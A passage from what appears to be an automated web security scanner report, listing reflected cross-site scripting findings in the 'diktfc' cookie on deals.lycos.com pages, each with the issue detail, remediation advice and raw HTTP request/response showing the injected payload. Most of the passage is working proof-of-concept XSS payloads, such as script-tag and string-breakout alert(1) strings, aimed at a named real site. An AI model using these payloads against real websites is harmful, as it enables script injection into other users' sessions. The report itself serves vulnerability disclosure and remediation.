The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56d85"%3balert(1)//7f46c76a176 was submitted in the diktfc cookie. This input was echoed as 56d85";alert(1)//7f46c76a176 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A56d85"%3balert(1)//7f46c76a176; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A56d85";alert(1)//7f46c76a176"
});
</script>
...[SNIP]...

3.214. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7362"><script>alert(1)</script>5134e7589ce was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:01 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce&amp;cj=1" alt="tracker" />
...[SNIP]...

3.215. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58697"><script>alert(1)</script>383e526ee99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:17 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99&amp;cj=1" alt="tracker" />
...[SNIP]...

3.216. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e54"%3balert(1)//ca2c7b2c015 was submitted in the diktfc cookie. This input was echoed as 22e54";alert(1)//ca2c7b2c015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A22e54"%3balert(1)//ca2c7b2c015; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:19 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A22e54";alert(1)//ca2c7b2c015"
});
</script>
...[SNIP]...

3.217. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f0b2"><script>alert(1)</script>781860d6eaf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf&amp;cj=1" alt="tracker" />
...[SNIP]...

3.218. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c764"%3balert(1)//b75df22a01a was submitted in the diktfc cookie. This input was echoed as 2c764";alert(1)//b75df22a01a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2c764"%3balert(1)//b75df22a01a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2c764";alert(1)//b75df22a01a"
});
</script>
...[SNIP]...

3.219. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2720-prepaid-cell-phone-for-6-413497

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c0"><script>alert(1)</script>d9b09df56e0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0&amp;cj=1" alt="tracker" />
...[SNIP]...

3.220. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2720-prepaid-cell-phone-for-6-413497

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b10"%3balert(1)//c0968ffef2c was submitted in the diktfc cookie. This input was echoed as b3b10";alert(1)//c0968ffef2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b10"%3balert(1)//c0968ffef2c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b10";alert(1)//c0968ffef2c"
});
</script>
...[SNIP]...

3.221. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db343"%3balert(1)//3b16844b478 was submitted in the diktfc cookie. This input was echoed as db343";alert(1)//3b16844b478 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adb343"%3balert(1)//3b16844b478; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adb343";alert(1)//3b16844b478"
});
</script>
...[SNIP]...

3.222. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4403f"><script>alert(1)</script>7f5d7171fd2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2&amp;cj=1" alt="tracker" />
...[SNIP]...

3.223. http://deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4eee"%3balert(1)//c42f28c6d4b was submitted in the diktfc cookie. This input was echoed as f4eee";alert(1)//c42f28c6d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af4eee"%3balert(1)//c42f28c6d4b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16317

